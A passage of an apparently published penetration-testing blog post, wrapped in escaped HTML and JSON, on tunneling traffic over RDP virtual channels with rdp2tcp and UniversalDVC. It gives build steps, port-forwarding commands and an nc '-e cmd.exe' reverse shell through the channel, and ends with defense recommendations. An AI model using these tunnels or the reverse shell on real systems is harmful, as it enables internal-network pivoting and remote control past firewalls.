rdp2tcp\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>rdp2tcp utilizes RDP virtual channel functionality for port multiplexing\u003C\u002Fp>\u003Cp>Available features:\u003C\u002Fp>\u003Cul>\u003Cli>Forward TCP port forwarding\u003C\u002Fli>\u003Cli>Reverse TCP port forwarding\u003C\u002Fli>\u003Cli>Handling standard input\u002Foutput forwarding\u003C\u002Fli>\u003Cli>SOCKS5 proxy\u003C\u002Fli>\u003C\u002Ful>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FV-E-O\u002Frdp2tcp\u003C\u002Fp>\u003Cp>Test system: Kali2 x64\u003C\u002Fp>\u003Ch3>1. Download and compile rdp2tcp\u003C\u002Fh3>\u003Ch4>(1) Install mingw-w64\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>apt-get install mingw-w64\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Download rdp2tcp\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone https:\u002F\u002Fgithub.com\u002FV-E-O\u002Frdp2tcp.git\u003Cbr>cd rdp2tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Modify the configuration file\u003C\u002Fh4>\u003Cp>rdp2tcp does not support compiling 64-bit exe by default, so it is necessary to modify the configuration file to add configuration information for compiling 64-bit exe\u003C\u002Fp>\u003Cp>Modify the file Makefile, the new content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>all: client server-mingw64\u003Cbr>\u003Cbr>client: client\u002Frdp2tcp\u003Cbr>client\u002Frdp2tcp:\u003Cbr>\tmake -C client\u003Cbr>\u003Cbr>#server-mingw32: server\u002Frdp2tcp.exe\u003Cbr>#server\u002Frdp2tcp.exe:\u003Cbr>#\tmake -C server -f Makefile.mingw32\u003Cbr>\u003Cbr>server-mingw64: server\u002Frdp2tcp64.exe\u003Cbr>server\u002Frdp2tcp64.exe:\u003Cbr>\tmake -C server -f Makefile.mingw64\u003Cbr>\u003Cbr>clean:\u003Cbr>\tmake -C client clean\u003Cbr>#\tmake -C server -f Makefile.mingw32 clean\u003Cbr>\tmake -C server -f Makefile.mingw64 clean\u003Cbr>\tmake -C tools clean\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Since we are using a 64-bit operating system and have installed 64-bit MinGW, it is configured here to generate 64-bit exe files.\u003C\u002Fp>\u003Cp>Create a new file \u002Fserver\u002FMakefile.mingw64 with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>BIN=rdp2tcp64.exe\u003Cbr>CC=i686-w64-mingw32-gcc\u003Cbr>CFLAGS=-Wall -g \\\u003Cbr>\t\t -D_WIN32_WINNT=0x0501 \\\u003Cbr>\t\t -I..\u002Fcommon\u003Cbr>\u003Cbr># -D_WIN32_WINNT=0x0501\u003Cbr># -D_WIN32_WINNT=0x0501 -DDEBUG\u003Cbr>\u003Cbr>LDFLAGS=-lwtsapi32 -lws2_32\u003Cbr>OBJS=\t..\u002Fcommon\u002Fiobuf.o \\\u003Cbr>\t..\u002Fcommon\u002Fprint.o \\\u003Cbr>\t..\u002Fcommon\u002Fmsgparser.o \\\u003Cbr>\t..\u002Fcommon\u002Fnethelper.o \\\u003Cbr>\t..\u002Fcommon\u002Fnetaddr.o \\\u003Cbr>\terrors.o aio.o events.o \\\u003Cbr>\ttunnel.o channel.o process.o commands.o main.o\u003Cbr>\u003Cbr>all: clean_common $(BIN)\u003Cbr>\u003Cbr>clean_common:\u003Cbr>\t$(MAKE) -C ..\u002Fcommon clean\u003Cbr>\u003Cbr>$(BIN): $(OBJS)\u003Cbr>\t$(CC) -o $@ $(OBJS) $(LDFLAGS) \u003Cbr>\u003Cbr>%.o: %.c\u003Cbr>\t$(CC) $(CFLAGS) -o $@ -c $&lt;\u003Cbr>\u003Cbr>clean:\u003Cbr>\trm -f $(OBJS) $(BIN)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(4) Compilation\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>make\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generates the following files:\u003C\u002Fp>\u003Cul>\u003Cli>\u002Fserver\u002Frdp2tcp64.exe\u003C\u002Fli>\u003Cli>\u002Fclient\u002Frdp2tcp\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. Install xfreerdp\u003C\u002Fh3>\u003Cp>The xfreerdp installed by default in Kali system does not support TCP redirection functionality\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019830436_2_4c0ceb20e5-1.jpeg\">\u003C\u002Fp>\u003Cp>If TCP redirection is supported, the program will display the following content\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019841410_3_a19e936b13-1.jpeg\">\u003C\u002Fp>\u003Cp>Need to re-download and compile xfreerdp. The version I used here is freerdp-nightly\u003C\u002Fp>\u003Cp>Reference link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fci.freerdp.com\u002Fjob\u002Ffreerdp-nightly-binaries\u002F\u003C\u002Fp>\u003Cp>The distribution I used here is bionic. The complete installation commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo \"deb http:\u002F\u002Fpub.freerdp.com\u002Frepositories\u002Fdeb\u002Fbionic\u002F freerdp-nightly main \" &gt;&gt;\u002Fetc\u002Fapt\u002Fsources.list\u003Cbr>wget -O - http:\u002F\u002Fpub.freerdp.com\u002Frepositories\u002FADD6BF6D97CE5D8D.asc | sudo apt-key add -\u003Cbr>apt-get update\u003Cbr>apt-get install freerdp-nightly\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding installation path is \u002Fopt\u002Ffreerdp-nightly\u003C\u002Fp>\u003Cp>To start the new version of xfreerdp, the corresponding path is: \u002Fopt\u002Ffreerdp-nightly\u002Fbin\u002Fxfreerdp\u003C\u002Fp>\u003Cp>The new version of xfreerdp supports TCP redirection, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019861671_4_2c1b4f2ab9-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Connect to remote desktop using xfreerdp and establish a tunnel\u003C\u002Fh3>\u003Cp>This section introduces the method for forward TCP port forwarding\u003C\u002Fp>\u003Ch4>(1) Execute xfreerdp and enable TCP redirection\u003C\u002Fh4>\u003Cp>Execute on Kali system:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Ffreerdp-nightly\u002Fbin\u002Fxfreerdp \u002Fv:192.168.112.129:3389 \u002Fu:1 \u002Fp:Test123! \u002Fcert-ignore \u002Frdp2tcp:\u002Froot\u002Frdp2tcp\u002Fclient\u002Frdp2tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Upload rdp2tcp64.exe to RDP Server and execute (no administrator privileges required)\u003C\u002Fh4>\u003Cp>Execution result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019867012_5_b6db672171-1.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Start rdp2tcp.py on Kali system\u003C\u002Fh4>\u003Cp>Commands as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd rdp2tcp\u002Ftools\u003Cbr>python rdp2tcp.py\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command to add forward port forwarding (local 445-&gt;192.168.112.129:445) is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python rdp2tcp.py add forward 127.0.0.1 445 192.168.112.129 445\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019870435_6_10373df03d-1.jpeg\">\u003C\u002Fp>\u003Ch4>(4) Access local port 445\u003C\u002Fh4>\u003Cp>Data accessing local port 445 is forwarded to port 445 of 192.168.112.129, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019874768_7_d69b9c8545-1.jpeg\">\u003C\u002Fp>\u003Cp>Forward port forwarding established successfully\u003C\u002Fp>\u003Ch2>0x05 Using UniversalDVC to establish a channel\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>UniversalDVC establishes a channel by registering the UDVC plugin in the form of using dynamic virtual channels\u003C\u002Fp>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fearthquake\u002FUniversalDVC\u003C\u002Fp>\u003Cp>Test system: Win7 x64\u003C\u002Fp>\u003Ch3>1. Install UDVC plugin\u003C\u002Fh3>\u003Cp>Download the compiled 64-bit file from the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fearthquake\u002FUniversalDVC\u002Ffiles\u002F1880297\u002FUDVC-x64.zip\u003C\u002Fp>\u003Cp>Save the 64-bit dll in %windir%\\system32\u003C\u002Fp>\u003Cp>The command to register the DLL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>regsvr32.exe UDVC-Plugin.x64.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019878321_8_69d05f4c05-1.jpeg\">\u003C\u002Fp>\u003Cp>After registering the UDVC plugin, registry entries will be created to save configuration information\u003C\u002Fp>\u003Cp>Configuration file location: HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\u003C\u002Fp>\u003Cp>The default listening port is 31337\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The UDVC plugin will only start listening on the port after the RDP Server launches UDVC-Server.exe\u003C\u002Fp>\u003Ch3>2. Implementing port forwarding functionality\u003C\u002Fh3>\u003Ch4>(1) Set Mode to Socket server mode (0 - default)\u003C\u002Fh4>\u003Cp>The cmd command to modify the registry is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hkcu\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\" \u002Fv mode \u002Ft REG_DWORD \u002Fd 0 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Set the listening port to 1234\u003C\u002Fh4>\u003Cp>The cmd command to modify the registry is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hkcu\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\" \u002Fv port \u002Ft REG_SZ \u002Fd 1234 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Start the Remote Desktop client\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mstsc.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Connect to Remote Desktop\u003C\u002Fp>\u003Ch4>(4) RDP Server starts UDVC-Server.exe\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>UDVC-Server.x64.exe -c -p 80 -i 192.168.112.129 -0\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) RDP Client opens a browser and accesses http:\u002F\u002F127.0.0.1:1234\u003C\u002Fh4>\u003Cp>Obtain data from the internal network 192.168.112.129:80\u003C\u002Fp>\u003Cp>Tunnel establishment completed, a brief flowchart is shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019881748_9_43a3b83c9e-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Implement reverse shell functionality\u003C\u002Fh3>\u003Cp>RDP Server sends a reverse shell to RDP Client\u003C\u002Fp>\u003Cp>RDP Client can control RDP Server in real-time, executing cmd commands\u003C\u002Fp>\u003Ch4>(1) Set Mode to Socket client mode (1)\u003C\u002Fh4>\u003Cp>The cmd command to modify the registry is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hkcu\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\" \u002Fv mode \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Set the listening port to 1234\u003C\u002Fh4>\u003Cp>The cmd command to modify the registry is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hkcu\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\" \u002Fv port \u002Ft REG_SZ \u002Fd 1234 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Start the Remote Desktop client\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mstsc.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Connect to Remote Desktop\u003C\u002Fp>\u003Ch4>(4) RDP Client uses nc to listen on local port 1234\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>nc64.exe -lvp 1234\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) RDP Server starts UDVC-Server.exe\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>UDVC-Server.x64.exe -p 5678 -0\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A dynamic virtual channel will now be established: RDP Server-&gt;RDP Client:1234\u003C\u002Fp>\u003Cp>And the RDP Server starts listening on port 5678\u003C\u002Fp>\u003Ch4>(6) The RDP Server uses nc to connect to local port 5678 and specifies the redirected program as c:\\windows\\system32\\cmd.exe\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>nc64.exe 127.0.0.1 5678 -e c:\\windows\\system32\\cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Channel establishment completed. A brief flowchart is shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019885521_10_1481cef1ff-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x06 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For these three channel establishment methods (file sharing, rdp2tcp, and UniversalDVC), the prerequisite for exploitation is having already obtained permission to connect to the remote desktop.\u003C\u002Fp>\u003Cp>Strictly speaking, once you can utilize this remote desktop server, you already have the ability to access internal network resources.\u003C\u002Fp>\u003Cp>The significance of researching this method lies in situations where the remote desktop server cannot run our programs.\u003C\u002Fp>\u003Cp>For example, if the remote desktop server is a Windows system, but the program we want to execute only supports Linux, this avoids the issue of program porting.\u003C\u002Fp>\u003Ch2>0x07 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Security of Internet-facing Remote Desktop Servers\u003C\u002Fp>\u003Cp>If an attacker can establish a channel using the Remote Desktop Protocol, it means the attacker has already gained access to the server. Therefore, for remote desktop servers accessible from the internet, it is essential not only to apply patches promptly but also to guard against password brute-force attacks.\u003C\u002Fp>\u003Cp>2. Disabling Redirected Devices Using Group Policy\u003C\u002Fp>\u003Cp>Group Policy Location:\u003C\u002Fp>\u003Cp>Computer Configuration-&gt;Administrative Templates-&gt;Windows Components-&gt;Remote Desktop Services-&gt;Remote Desktop Session Host-&gt;Device and Resource Redirection\u003C\u002Fp>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article references @cpl3h's post, organizes methods for establishing channels using the Remote Desktop Protocol, incorporates personal experience, adds individual insights, analyzes exploitation approaches, and summarizes defense recommendations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1515,"Onedaysec",7,"published","2026-02-02T08:19:47.662Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"RDP Tunneling Techniques: File Sharing & rdp2tcp for Penetration","RDP tunneling, penetration testing, remote desktop protocol, rdp2tcp, file sharing tunnels, Cobalt Strike, network pivoting, firewall bypass, cybersecurity",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4,47],198,197,196,194,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.746Z","2026-07-23T16:01:10.240Z","draft","2026-07-23T16:04:26.784Z"]